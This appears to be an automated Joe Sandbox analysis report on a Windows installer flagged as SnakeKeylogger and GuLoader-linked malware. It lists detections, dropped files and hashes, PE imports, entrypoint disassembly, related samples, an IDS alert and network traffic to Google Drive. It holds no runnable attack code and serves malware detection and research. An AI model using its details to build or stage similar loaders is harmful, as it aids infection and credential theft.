      Source | Detection | Scanner | Label | Link
      fTSt7dc60O.exe | 77% | Virustotal | | Browse
      fTSt7dc60O.exe | 67% | ReversingLabs | Win32.Trojan.SnakeKeylogger |
      Source | Detection | Scanner | Label | Link
      C:\Users\user\AppData\Local\Temp\nsb9BB3.tmp\System.dll | 0% | ReversingLabs | |
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label | Link
      https://www.google.comuI( | 0% | Avira URL Cloud | safe |
      https://drive.go | 0% | Avira URL Cloud | safe |
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      drive.google.com | 172.217.18.14 | true | false | | high
      drive.usercontent.google.com | 142.250.186.161 | true | false | | high
                                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                142.250.186.161 | drive.usercontent.google.com | United States | | 15169 | GOOGLEUS | false
                                172.217.18.14 | drive.google.com | United States | | 15169 | GOOGLEUS | false
                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1587610
                                Start date and time:2025-01-10 15:37:46 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 45s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:14
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:fTSt7dc60O.exe
                                renamed because original name is a hash value
                                Original Sample Name:2eaf30511cb438075facb1d59f944a6ddedf3aa5c2620e0916a150f5415983bb.exe
                                Detection:MAL
                                Classification:mal68.troj.evad.winEXE@3/10@2/2
                                EGA Information:
                                • Successful, ratio: 50%
                                HCA Information:
                                • Successful, ratio: 90%
                                • Number of executed functions: 48
                                • Number of non-executed functions: 76
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target fTSt7dc60O.exe, PID 4640 because there are no executed function
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                Time | Type | Description
                                11:36:40 | API Interceptor | 43x Sleep call for process: fTSt7dc60O.exe modified
                                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                37f463bf4616ecd445d4a1937da06e19 | nRNzqQOQwk.exe | malicious | GuLoader | 142.250.186.161, 172.217.18.14
                                 | You7ynHizy.exe | malicious | GuLoader | 142.250.186.161, 172.217.18.14
                                 | Xjz8dblHDe.exe | malicious | GuLoader | 142.250.186.161, 172.217.18.14
                                 | zrNcqxZRSM.exe | malicious | CobaltStrike, Metasploit | 142.250.186.161, 172.217.18.14
                                 | CY SEC AUDIT PLAN 2025.docx.doc | malicious | Unknown | 142.250.186.161, 172.217.18.14
                                 | gem1.exe | malicious | CredGrabber, Meduza Stealer | 142.250.186.161, 172.217.18.14
                                 | FIWszl1A8l.exe | malicious | GhostRat | 142.250.186.161, 172.217.18.14
                                 | 2873466535874-68348745.02.exe | malicious | Unknown | 142.250.186.161, 172.217.18.14
                                 | n41dQbiw1Y.exe | malicious | Babuk, Djvu | 142.250.186.161, 172.217.18.14
                                Match | Associated Sample Name / URL | Detection | Threat Name
                                C:\Users\user\AppData\Local\Temp\nsb9BB3.tmp\System.dll | ME-SPC-94.03.60.175.07.exe | malicious | GuLoader
                                 | 09-FD-94.03.60.175.07.xlsx.exe | malicious | GuLoader
                                 | TEC-SPC-94.03.60.175.07.exe | malicious | GuLoader
                                 | ME-SPC-94.03.60.175.07.exe | malicious | GuLoader
                                 | 09-FD-94.03.60.175.07.xlsx.exe | malicious | GuLoader
                                 | TEC-SPC-94.03.60.175.07.exe | malicious | GuLoader
                                 | Purchase-Order27112024.scr.exe | malicious | Remcos, GuLoader
                                 | 563299efce875400a8d9b44b96597c8e-sample (1).zip | malicious | Unknown
                                 | debit-note-19-08-dn-2024.exe | malicious | GuLoader
                                 | debit-note-19-08-dn-2024.exe | malicious | GuLoader
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):45
                                                    Entropy (8bit):4.7748605961854445
                                                    Encrypted:false
                                                    SSDEEP:3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
                                                    MD5:8B9FC0443D7E48145E2D4B37AFB2D37B
                                                    SHA1:64A5718A478A38AC262D2E46DA81D0E88C122A0F
                                                    SHA-256:4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
                                                    SHA-512:5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:[ReBoot]..Ac=user32::EnumWindows(i r2 ,i 0)..
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):11776
                                                    Entropy (8bit):5.656006343879828
                                                    Encrypted:false
                                                    SSDEEP:192:eP24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlbSl:T8QIl975eXqlWBrz7YLOlb
                                                    MD5:3E6BF00B3AC976122F982AE2AADB1C51
                                                    SHA1:CAAB188F7FDC84D3FDCB2922EDEEB5ED576BD31D
                                                    SHA-256:4FF9B2678D698677C5D9732678F9CF53F17290E09D053691AAC4CC6E6F595CBE
                                                    SHA-512:1286F05E6A7E6B691F6E479638E7179897598E171B52EB3A3DC0E830415251069D29416B6D1FFC6D7DCE8DA5625E1479BE06DB9B7179E7776659C5C1AD6AA706
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: ME-SPC-94.03.60.175.07.exe, Detection: malicious, Browse
                                                    • Filename: 09-FD-94.03.60.175.07.xlsx.exe, Detection: malicious, Browse
                                                    • Filename: TEC-SPC-94.03.60.175.07.exe, Detection: malicious, Browse
                                                    • Filename: ME-SPC-94.03.60.175.07.exe, Detection: malicious, Browse
                                                    • Filename: 09-FD-94.03.60.175.07.xlsx.exe, Detection: malicious, Browse
                                                    • Filename: TEC-SPC-94.03.60.175.07.exe, Detection: malicious, Browse
                                                    • Filename: Purchase-Order27112024.scr.exe, Detection: malicious, Browse
                                                    • Filename: 563299efce875400a8d9b44b96597c8e-sample (1).zip, Detection: malicious, Browse
                                                    • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                    • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                    Reputation:moderate, very likely benign file
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1217498
                                                    Entropy (8bit):3.427451882823274
                                                    Encrypted:false
                                                    SSDEEP:6144:fP7xZKjyqa1PPe9DvJ4usQC5ZQR9dzrDG4Eu/Oi9g9p0AJ2aJ4aKh:fP7x2y91u9vJCQC/QTdS48XoPh
                                                    MD5:1AFBA10167DB501871718FBB45009140
                                                    SHA1:A299CE179AEA09CB1A26E3CC024CC4CEC13A8C45
                                                    SHA-256:C778E9D379CCF47CCF6BC317BE52D78BDCDE1FB9CC7D5718D3EAD96EA46D46AC
                                                    SHA-512:44C9E6396620CEA8DF3EA340B408DA126007B4AE162CC5F37C2C763FE3F010F3A58DC1761255ED74501FF45A7D6A9ACB43091B9A0ACB0E719C2C51B9867B76A2
                                                    Malicious:false
                                                    Reputation:low
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):28
                                                    Entropy (8bit):4.110577243331642
                                                    Encrypted:false
                                                    SSDEEP:3:iGAeTUHvn:lAeTUHv
                                                    MD5:F6A80CF0B011E1638B38D8EAA2A9629B
                                                    SHA1:30AB7FEEC5D0A304ED9908ADD562601E3E7118C3
                                                    SHA-256:AB3B162F39F8FDBD8DD767791EC116E75DA198FCE6BABBA6E1677044678714D8
                                                    SHA-512:E1EC33696EA5086DEA0A52B577442B96124B71CD09999637185D114B7E5F313D455560C350F5A02FBA83C5A3A12A5234EEC995D0AF0CBF64471B3887E2AA2ED8
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:[Access]..Setting=Disabled..
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):309738
                                                    Entropy (8bit):7.516382939689266
                                                    Encrypted:false
                                                    SSDEEP:6144:yZKjyqa1PPe9DvJ4usQC5ZQR9dzrDG4Eu/O9:y2y91u9vJCQC/QTdS489
                                                    MD5:C2E2BE2ACF5991EC7009DDC5D8B361DF
                                                    SHA1:FC1C8390F2BA0E997B7AD4AD30CFBBF1B181B695
                                                    SHA-256:E3738968906D3EDADA7CD870CCEB2882FED2FEFA0610B8AE063E9F8457F2A118
                                                    SHA-512:5C103560D7948C5208C54401E2C20B1066D8DE27F63BBD73FCA28DD52AA44780B8F8F9A02D1F0039F0792630E1CE99B3BF09ADE271540543D95D63ABABDDC7B4
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):27357
                                                    Entropy (8bit):4.575459332843998
                                                    Encrypted:false
                                                    SSDEEP:768:67lqhYoAunEaZqOMl7D28MUQ7iM5DFTmD:6M2oznsJn0UQ7/5DFK
                                                    MD5:91B75B6174DE619A40B45FB2247B3AFD
                                                    SHA1:F9126CD2CC8244372E46F31C81C46932E083EE2F
                                                    SHA-256:EA87B1D2A30A008F82A07E61A71B936521D74FC0818AAA7E364CC99A2198608C
                                                    SHA-512:41BDD3F1941B419184E685A548E97AAFDFFE411D122176F5AD931CCB933CD4A8A784F842DE1A46BF4082222968A5679F8A6B92C74E6BE26BE3BE0B20C56F84E4
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):207998
                                                    Entropy (8bit):1.2479248406208852
                                                    Encrypted:false
                                                    SSDEEP:768:tCENokMNjB1phztRILF3znwMWQZeRdtDL7xIC8GI82e/2awZ6aXmpeNhLvkoVtOX:e03p6cf0/e9ReE8H
                                                    MD5:5C283F56F45AD89C5D82538EA09AC0F5
                                                    SHA1:FA3736CF43F5841B9D4E28FF2024C17897EEF745
                                                    SHA-256:D53EE062B5FA4EB7DED4A658B37B70DD6E90A581AF5BDE713169971AE249F605
                                                    SHA-512:2B2516707050C5DFB7A8D9E151DEE98EDD44B59B08E0F19D301F80BFDE89129F47EC6079AC1E26F6D8C60AAFE2931A4D2BC720BEDD8149477810B0C8F558AD0A
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):443489
                                                    Entropy (8bit):1.2463028275519636
                                                    Encrypted:false
                                                    SSDEEP:768:0B5HMEmj1BG+VGKVbkxUNjTj4Yl+ieTSrPb/1aKigAurLC2DVyTaL7B8IHBxCoxa:0kFoC4xKmYKV1tmGJJt0a+sWH0
                                                    MD5:913964ACDFFFA24344A401D48E08C653
                                                    SHA1:EE1E0AC79DA12D6439F9DF5B865347647473642A
                                                    SHA-256:B3A4E2499F6A793497BAB8F5B6CC38462FD70F955308596ACFFF03D11F2F6ED4
                                                    SHA-512:2AEBEB7DFFACF4150CCF6ED91EF5501B129331E5A2A4A465FC542562C52907FDA3990F7BE5F17B60854DE7FD34E6E2E873ED8C0DE6788964894890F69A9F261C
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):209062
                                                    Entropy (8bit):1.2469617066336303
                                                    Encrypted:false
                                                    SSDEEP:768:aq+yDnL4aSptsfjJcMBkQnTum3yc5rUGLJTLAP6zp2R5O73XKymSRQoWgqVB7L+v:T7c811jBM9Y1qeu30oHw
                                                    MD5:607886D87859E45164D2959809AB5367
                                                    SHA1:4E86EB72512D4C9BE32304E3A12B499D6A86084B
                                                    SHA-256:A05695DF251298ED2F35E2DFA2C4CF44D5BACCC391615FACD34FA6411BB43217
                                                    SHA-512:A767C56234A265E17FE3D05A1218D628419E3B750E7D55DD5E2D57A847DBF7B72E10270A1D9D14D39D62BCEF38818DE54168AF87C2DE59FDBF503F0C382DA5DE
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                    Category:dropped
                                                    Size (bytes):900
                                                    Entropy (8bit):3.5128877462339747
                                                    Encrypted:false
                                                    SSDEEP:12:8wl0c0a/ledp8wXuQUlbq/JMRPbdpYmHbqjMRJNSkXg1MJsW+slmYalzJCN85v4U:8QudO/9Q6jd9a6Ooy3Nr24qy
                                                    MD5:95B268D3221CF11045F707181993954F
                                                    SHA1:DCBB6EFFDF3201BA96B6BCCF45988D9B91F05440
                                                    SHA-256:E132240D5DD1D9A30CC74BF95A5560896E1257335665CE86B7089F21FDFA208D
                                                    SHA-512:E3302FAAB83F85D601BDD7309078784F66B591B4F8C1DE0A3F0C7159174F4EE45CD9CBB0A96D2C7D8D49ACB291B7ADE50CECDED943BCE865C2D82D80FFE51A5F
                                                    Malicious:false
                                                    Preview:L..................F........................................................q....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".f.1...........Common Files..J............................................C.o.m.m.o.n. .F.i.l.e.s.....b.2...........cutline.sil.H............................................c.u.t.l.i.n.e...s.i.l.......2.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.o.m.m.o.n. .F.i.l.e.s.\.c.u.t.l.i.n.e...s.i.l.J.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.t.y.p.h.l.o.s.t.o.m.y.........,...............$M....>M...EQ ..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Entropy (8bit):7.887380640693706
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:fTSt7dc60O.exe
                                                    File size:540'745 bytes
                                                    MD5:0eecc852b848039da55141fb43dd01e2
                                                    SHA1:9f1f57db9890e515dd132bc7d1157ef1a2ff0cad
                                                    SHA256:2eaf30511cb438075facb1d59f944a6ddedf3aa5c2620e0916a150f5415983bb
                                                    SHA512:74bb690253ce11bc69e783b1b12561678fb71470f42ee15a5280719503bfe6866693973e52022c26cb2a08616d53a7eeb2973c3763aeb1c9618c7cdf1529a5b5
                                                    SSDEEP:12288:XRV78GLIlIYtQ5viB2XZptlrmp/jcnVCyd0ZjfMjhixmCGs7:IplJtQ5aBsl2jQoyd0Zj0sxzGs7
                                                    TLSH:01B42304BCC2EC1EC58A5DF14BB6C6BAB17AFE26691025876F713E5F2C60BC1407D286
                                                    Icon Hash:0714262e34390f06
                                                    Entrypoint:0x40335a
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x54336EB4 [Tue Oct 7 04:40:20 2014 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                    Instruction
                                                    sub esp, 000002D8h
                                                    push ebx
                                                    push ebp
                                                    push esi
                                                    push edi
                                                    push 00000020h
                                                    xor ebp, ebp
                                                    pop esi
                                                    mov dword ptr [esp+18h], ebp
                                                    mov dword ptr [esp+10h], 00409230h
                                                    mov dword ptr [esp+14h], ebp
                                                    call dword ptr [00407034h]
                                                    push 00008001h
                                                    call dword ptr [004070BCh]
                                                    push ebp
                                                    call dword ptr [004072ACh]
                                                    push 00000009h
                                                    mov dword ptr [004292B8h], eax
                                                    call 00007FF0147C642Ah
                                                    mov dword ptr [00429204h], eax
                                                    push ebp
                                                    lea eax, dword ptr [esp+38h]
                                                    push 000002B4h
                                                    push eax
                                                    push ebp
                                                    push 004206A8h
                                                    call dword ptr [0040717Ch]
                                                    push 0040937Ch
                                                    push 00428200h
                                                    call 00007FF0147C6095h
                                                    call dword ptr [00407134h]
                                                    mov ebx, 00434000h
                                                    push eax
                                                    push ebx
                                                    call 00007FF0147C6083h
                                                    push ebp
                                                    call dword ptr [0040710Ch]
                                                    push 00000022h
                                                    mov dword ptr [00429200h], eax
                                                    pop edi
                                                    mov eax, ebx
                                                    cmp word ptr [00434000h], di
                                                    jne 00007FF0147C3519h
                                                    mov esi, edi
                                                    mov eax, 00434002h
                                                    push esi
                                                    push eax
                                                    call 00007FF0147C5AD3h
                                                    push eax
                                                    call dword ptr [00407240h]
                                                    mov ecx, eax
                                                    mov dword ptr [esp+1Ch], ecx
                                                    jmp 00007FF0147C360Bh
                                                    push 00000020h
                                                    pop edx
                                                    cmp ax, dx
                                                    jne 00007FF0147C3519h
                                                    inc ecx
                                                    inc ecx
                                                    cmp word ptr [ecx], dx
                                                    Programming Language:
                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4a000 | 0x132d8 | .rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                    .text | 0x1000 | 0x5ec6 | 0x6000 | 60ec0c4d80dd6821cdaced6135eddfd5 | False | 0.6593424479166666 | data | 6.438901783265187 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata | 0x7000 | 0x1354 | 0x1400 | 2222fe44ebbadbc32af32dfc9c88e48e | False | 0.4306640625 | data | 5.037511188789184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data | 0x9000 | 0x202f8 | 0x600 | 99cdd6cde9adee6bf3b24ee817b4574b | False | 0.4830729166666667 | data | 3.8340327961758165 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .ndata | 0x2a000 | 0x20000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc | 0x4a000 | 0x132d8 | 0x13400 | 6a5bbc33287fc34c026c3652aab40ca4 | False | 0.7685800527597403 | data | 6.977243320980138 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                    RT_ICON | 0x4a448 | 0xb1b3 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9923501351915763
                                                    RT_ICON | 0x55600 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.4311203319502075
                                                    RT_ICON | 0x57ba8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.48053470919324576
                                                    RT_ICON | 0x58c50 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.5330490405117271
                                                    RT_ICON | 0x59af8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5647540983606557
                                                    RT_ICON | 0x5a480 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.6353790613718412
                                                    RT_ICON | 0x5ad28 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.5961981566820277
                                                    RT_ICON | 0x5b3f0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3176829268292683
                                                    RT_ICON | 0x5ba58 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.42124277456647397
                                                    RT_ICON | 0x5bfc0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6453900709219859
                                                    RT_ICON | 0x5c428 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.4274193548387097
                                                    RT_ICON | 0x5c710 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.4651639344262295
                                                    RT_ICON | 0x5c8f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5067567567567568
                                                    RT_DIALOG | 0x5ca20 | 0x100 | data | English | United States | 0.5234375
                                                    RT_DIALOG | 0x5cb20 | 0x11c | data | English | United States | 0.6056338028169014
                                                    RT_DIALOG | 0x5cc40 | 0xc4 | data | English | United States | 0.5918367346938775
                                                    RT_DIALOG | 0x5cd08 | 0x60 | data | English | United States | 0.7291666666666666
                                                    RT_GROUP_ICON | 0x5cd68 | 0xbc | data | English | United States | 0.601063829787234
                                                    RT_VERSION | 0x5ce28 | 0x1a4 | data | English | United States | 0.5642857142857143
                                                    RT_MANIFEST | 0x5cfd0 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984
                                                    DLL | Import
                                                    KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                    USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                    GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                    SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                    ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                    COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                    ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                    VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                    Language of compilation system | Country where language is spoken | Map
                                                    English | United States |
                                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                    2025-01-10T15:39:04.044797+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 51990 | 172.217.18.14 | 443 | TCP
                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Jan 10, 2025 15:39:12.745438099 CET44352053172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:12.745634079 CET44352053172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:12.745686054 CET52053443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:12.745948076 CET52053443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:12.787327051 CET44352053172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:13.132972956 CET44352053172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:13.133105993 CET52053443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:13.133326054 CET44352053172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:13.133332968 CET52053443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:13.133374929 CET52053443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:13.133392096 CET44352053172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:13.133402109 CET52053443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:13.133436918 CET52053443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:13.161254883 CET52062443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:13.161308050 CET44352062142.250.186.161192.168.2.7
